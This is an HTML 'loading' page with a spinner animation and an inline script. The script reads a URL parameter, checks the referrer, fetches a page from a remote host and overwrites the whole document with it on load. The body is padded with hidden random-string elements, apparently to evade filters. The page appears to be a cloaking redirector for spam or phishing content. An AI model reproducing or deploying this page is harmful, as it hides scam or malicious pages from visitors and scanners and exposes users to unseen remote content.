<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .yyCESp6Yp {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .yyCESp6Yp .TuAned {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .yyCESp6Yp .content {
            line-height: 50px;
            text-align: center
        }

        .yyCESp6Yp .img {
            width: 100%
        }

        .yyCESp6Yp .fjUpGmdEiS {
            text-align: center
        }

        .yyCESp6Yp .fjUpGmdEiS span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .yyCESp6Yp .fjUpGmdEiS span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .yyCESp6Yp .fjUpGmdEiS span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .yyCESp6Yp .fjUpGmdEiS span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .yyCESp6Yp .fjUpGmdEiS span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .yyCESp6Yp .fjUpGmdEiS span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .yyCESp6Yp .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function agCOeNjYR(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var Z6zqZM = agCOeNjYR('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ Z6zqZM +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ Z6zqZM +".html?a=share";
		}
		
        MD83wxhYq=url+"#"+new Date().getTime();
        MD83wxhYq && function() {
            $.get(MD83wxhYq, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<span style='display:none'>vEc3J1VqyapuNNOWuyvnVO1menB3dVRyn3Gw5bkssJQ0EyyJyzUb18TpoX1kQzPXb8RkFSRIr8nLjks7tkQc0hhOrVACDzn</span>
<li style='display:none' >WENvR0PGuk33ES0vwgPHEvge9uGm8I</li>
<li style='display:none' >WENvR0PGuk33ES0vwgPHEvge9uGm8I</li>
<b style='display:none' >xV1VNAf9CLTk0bu3RHxIfiPk9fh7XTBXPWH8x4932aMHcbKViawViD1ux9PvRTiCseAaQoAFFdt</b>
<b style='display:none' >xV1VNAf9CLTk0bu3RHxIfiPk9fh7XTBXPWH8x4932aMHcbKViawViD1ux9PvRTiCseAaQoAFFdt</b>
<p  style='display:none'>nGFX92nM6zKkm3d92MVrNG0Ti24ChDYtJ8d5pKTfGuADfb7nmbYlCvHlKLCIsf92uAlzTz9rNkuS3SE8JghRQQtiqDO8T</p>
<ul style='display:none' >ByZhJDiPqqcRRkgaXrpkPm6dwtxzp</ul><div class="yyCESp6Yp">
    <div class="TuAned">
        <div class="fjUpGmdEiS">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<span style='display:none'>FVeB3t2wKWTDx3877cnxlwIV7RA3vmeASi1fhJUaCmLMg8bfCLwECbuevihnbKeypsm4i</span>
<img  src='' style='display:none'>
<img  src='' style='display:none'>
<h1 style='display:none' >dxmAyOiLtwCQLYU04EEd61aiINzKPxLflQRPL2emx</h1>
<ul style='display:none' >JJvYUtQLXb9zn566k1n1ZXZwHLc</ul>
<b style='display:none' >rnG7gTVKWaus07bOkTYTa1khK0B3RE1l4Y738hpE</b>
<li style='display:none' >rOgCMsXMq7xc37cFcSFnO1fnkv96IN3TTpToYc4XsqrLkd2hhHA6gJ66Ln3LHZ3xlrW043f4U</li>
<img  src='' style='display:none'>
<b style='display:none' >rnG7gTVKWaus07bOkTYTa1khK0B3RE1l4Y738hpE</b>
<span style='display:none'>FVeB3t2wKWTDx3877cnxlwIV7RA3vmeASi1fhJUaCmLMg8bfCLwECbuevihnbKeypsm4i</span></body>
</html>